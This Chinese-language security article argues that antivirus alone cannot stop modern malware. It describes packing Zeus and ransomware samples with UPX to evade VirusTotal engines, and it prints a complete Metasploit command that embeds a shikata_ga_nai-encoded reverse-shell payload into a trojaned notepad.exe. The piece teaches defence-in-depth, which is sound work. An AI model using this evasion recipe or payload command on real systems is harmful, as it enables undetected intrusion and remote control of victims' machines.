端點(diǎn)防病毒軟件沒什么用，目前這個(gè)秘密已經(jīng)公開：最近業(yè)界最大的防病毒供應(yīng)商被發(fā)現(xiàn)未能檢測和阻止高級(jí)持續(xù)性攻擊。當(dāng)然，對(duì)于真正的信息安全從業(yè)者而言，這并不是什么秘密。而對(duì)于很多消費(fèi)者以及一些C級(jí)管理人員來說，這個(gè)事件表明，如果沒有額外的安全技術(shù)，防病毒軟件幾乎無法抵御現(xiàn)在的網(wǎng)絡(luò)攻擊。但這個(gè)事件的好處是暴露了攻擊者現(xiàn)在用于輕松地規(guī)避反惡意軟件產(chǎn)品的高級(jí)方法。

簡要地回顧一下，在今年1月下旬，紐約時(shí)報(bào)報(bào)道了源自中國的網(wǎng)絡(luò)攻擊，該攻擊至少持續(xù)了4個(gè)月而未被發(fā)現(xiàn)。據(jù)稱，攻擊者首先通過魚叉式釣魚攻擊獲取初步網(wǎng)絡(luò)訪問權(quán)限，然后使用有效的登錄信息進(jìn)入網(wǎng)絡(luò)，甚至侵入到幾十名員工的計(jì)算機(jī)中，他們?cè)噲D找尋涉及中國總理文章的記者的消息來源。

紐約時(shí)報(bào)報(bào)道，攻擊者在其網(wǎng)絡(luò)上至少安裝了45個(gè)自定義惡意軟件，而系統(tǒng)中安裝了賽門鐵克反惡意軟件產(chǎn)品只檢測到其中一個(gè)。隨后，賽門鐵克作出回應(yīng)，指出額外安全層的重要性，例如基于信譽(yù)的技術(shù)和基于行為的阻止。賽門鐵克聲明的最后一行有些抱怨：“單靠防病毒軟件是不夠的。”

賽門鐵克是對(duì)的，單靠防病毒軟件并不能保護(hù)私有網(wǎng)絡(luò)免受惡意軟件的攻擊，無論啟發(fā)理論多么復(fù)雜或者多么高級(jí)。任何企業(yè)都不能單純依靠防病毒軟件，因?yàn)楝F(xiàn)在攻擊者有很多不同的辦法來修改可執(zhí)行文件。在本文中，我們將研究攻擊者使用的一些高級(jí)技術(shù)，以證明企業(yè)要檢測高級(jí)惡意軟件攻擊是多么困難。但所有安全專業(yè)人員還應(yīng)該繼續(xù)研究攻擊者使用的新方法，并且記住，惡意軟件編寫者使用的技術(shù)不斷地在演變。

模糊處理以規(guī)避檢測

攻擊者用以規(guī)避防病毒檢測的技術(shù)之一是壓縮。應(yīng)用開發(fā)人員使用壓縮的最初目的是縮小其程序文件以方便分發(fā)，而惡意軟件編寫者則使用壓縮來模糊可執(zhí)行文件的內(nèi)容。通過使用壓縮技術(shù)，惡意軟件編寫者發(fā)現(xiàn)他們可以修改其代碼來規(guī)避基于簽名的防病毒軟件。有很多應(yīng)用可以用于壓縮，其中最流行的是針對(duì)可執(zhí)行文件的Ultimate Packer（UPX），這是一個(gè)開源應(yīng)用，可通過Sourceforge下載。

筆者使用該技術(shù)來對(duì)付已知的惡意軟件樣本，用以證明通過壓縮技術(shù)的模糊處理的有效性。我發(fā)現(xiàn)收集多年來遇到的惡意軟件樣本有助于測試新的防御方法和驗(yàn)證檢測策略，我選擇了收集樣本中兩個(gè)最臭名昭著的惡意軟件，其中一個(gè)是Zeus木馬的變體，該變體在2012年5月成功規(guī)避了防病毒系統(tǒng)的檢測。第二個(gè)是獲得巨大成功的勒索軟件的變體，它類似于假的防病毒軟件，一直在禍害著世界各地的IT部門。

目前市場上任何有最新簽名的防病毒產(chǎn)品都能夠很容易分辨出這兩個(gè)較舊的惡意軟件樣本。筆者將這兩個(gè)惡意軟件放到virustotal.com的免費(fèi)web服務(wù)來測試，該網(wǎng)站通過多達(dá)46種不同的防病毒引擎來分析可疑文件和網(wǎng)址。結(jié)果是46個(gè)防病毒引擎中的43個(gè)引擎檢測到了Zeus，而42個(gè)檢測到假的防病毒軟件。

隨后筆者通過可執(zhí)行封裝機(jī)來封裝這兩個(gè)文件，并通過virustotal.com掃描，然后比較兩次的結(jié)果。

封裝后的Zeus木馬能夠規(guī)避另外12個(gè)防病毒檢測引擎，這是意料之中的。然而，令人意外的是，幾個(gè)主流防病毒引擎對(duì)該木馬的識(shí)別不一樣，微軟的引擎沒注意到該壓縮文件，而賽門鐵克引擎則將其重新分類為“可疑工具”。

并不只有賽門鐵克重新分類該惡意軟件類型，下面的列表顯示，除了McAfee，大多數(shù)知名防病毒引擎也對(duì)該惡意軟件重新分類。盡管該惡意軟件進(jìn)行了修改，McAfee仍然能夠檢測出來。下一個(gè)測試將驗(yàn)證McAfee是否同樣能夠檢測出另一個(gè)封裝后的惡意軟件樣本。

封裝的假冒防病毒勒索軟件的測試結(jié)果甚至比封裝的Zeus木馬的結(jié)果更差。另外3個(gè)防病毒引擎沒有檢測到該勒索軟件，總共有15個(gè)防病毒廠商沒有檢測到。而賽門鐵克竟然完全無法檢測出封裝的勒索軟件可執(zhí)行文件中的任何惡意軟件，但賽門鐵克肯定不是唯一。

McAfee和微軟在這個(gè)測試中表現(xiàn)都不錯(cuò)。然而，這并不意味著這些防病毒引擎比其他方法提供的保護(hù)更好。該測試僅使用相同壓縮工具封裝的兩個(gè)不同文件，如果使用不同惡意軟件樣本或壓縮工具，測試結(jié)果肯定完全不同。這項(xiàng)結(jié)果只是表明，攻擊者可能使用這種方法繞過防病毒引擎，但攻擊者也可以利用很多其他方法來繞過所有引擎。#p#

使用滲透測試框架封裝漏洞

筆者的下一個(gè)測試使用了流行的Metasploit社區(qū)版滲透測試框架。該工具因其開放貢獻(xiàn)式的開發(fā)和靈活性而聞名。封裝漏洞或進(jìn)入文件的后門程序功能是幾年前增加的關(guān)鍵功能，該功能可以應(yīng)用到滲透測試中。很多流行的文件格式可以通過該工具來創(chuàng)建，包括PDF和所有標(biāo)準(zhǔn)微軟Office格式。該工具還可以從默認(rèn)微軟windows程序文件中獲取模板，生成可執(zhí)行文件。毫無戒心的用戶很可能會(huì)運(yùn)行“notepad.exe”，并不會(huì)發(fā)現(xiàn)它已經(jīng)被修改。這就是滲透測試者如何規(guī)避防病毒引擎，以及模擬惡意軟件編寫者如何生成逼真的惡意代碼。

筆者通過以下命令運(yùn)行了幾個(gè)標(biāo)準(zhǔn)微軟Windows可執(zhí)行文件來測試防病毒軟件檢測率：

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe

這被輸送到編碼器，它使用shikata ga nai編碼器輸送五次，在日語中是“沒辦法”的意思，在這里也指Metasploit用以創(chuàng)建可執(zhí)行文件的多態(tài)XOR添加反饋編碼器。最后的notepad2.exe通過使用notepad.exe作為模板來生成。受害者將執(zhí)行notepad2.exe以及創(chuàng)建到192.167.1.75的C&C服務(wù)器的后門連接。

然后我們上傳和掃描notepad2.exe來測試前面測試中的相同防病毒引擎的檢測功能。Virustotal.com的所有46個(gè)防病毒引擎都完全沒有通過這個(gè)測試，沒有任何一個(gè)引擎（包括微軟、賽門鐵克和McAfee）檢測出編碼在該文件中的后門程序。但這并不奇怪。這個(gè)結(jié)果是我們意料之中的，它證明了基于簽名的防病毒引擎的局限性—防病毒引擎必須之前看過惡意軟件才可能檢測出它。

請(qǐng)注意，這些測試都是非科學(xué)性的，這并不意味著防病毒軟件無法抵御惡意軟件攻擊。但這表明，防病毒軟件只是用以保護(hù)企業(yè)計(jì)算資產(chǎn)的整個(gè)深度防御戰(zhàn)略的一部分，正如賽門鐵克在對(duì)紐約時(shí)報(bào)文章的回應(yīng)聲明中所寫的。

不止反惡意軟件  還要增加其它技術(shù)

最后首席信息安全官現(xiàn)在應(yīng)該采取行動(dòng)，讓企業(yè)考慮除了反惡意軟件系統(tǒng)，還要增加額外的安全技術(shù)。例如，反惡意軟件可以結(jié)合白名單，這樣只有經(jīng)批準(zhǔn)的程序可以在客戶端機(jī)器上運(yùn)行。下一代防火墻、IPS/IDS和web過濾系統(tǒng)都可以用于檢測異常網(wǎng)絡(luò)流量，因?yàn)楫惓Ａ髁繋缀蹩偸前殡S著惡意軟件感染。當(dāng)然，如果沒有人的干預(yù)，沒有哪個(gè)系統(tǒng)能夠保證其效力，所以企業(yè)需要部署一個(gè)專業(yè)的安全人員來負(fù)責(zé)監(jiān)控企業(yè)所使用的安全系統(tǒng)。

最近防病毒軟件已經(jīng)飽受批評(píng)，這使人們開始質(zhì)疑防病毒軟件是不是沒用。防病毒軟件是有用的，但它只是整體防御戰(zhàn)略的一部分。即使是最基本的攻擊都可以輕而易舉的有效模糊化，正如上面所述，這進(jìn)一步證明，有效的信息安全永遠(yuǎn)不應(yīng)該只是依賴于一種產(chǎn)品或者安全層，而應(yīng)該依賴于多層和多種技術(shù)來進(jìn)行全面的風(fēng)險(xiǎn)管理。紐約時(shí)報(bào)事件和其他類似事件應(yīng)該作為催化劑，推動(dòng)企業(yè)部署新出現(xiàn)的反惡意軟件。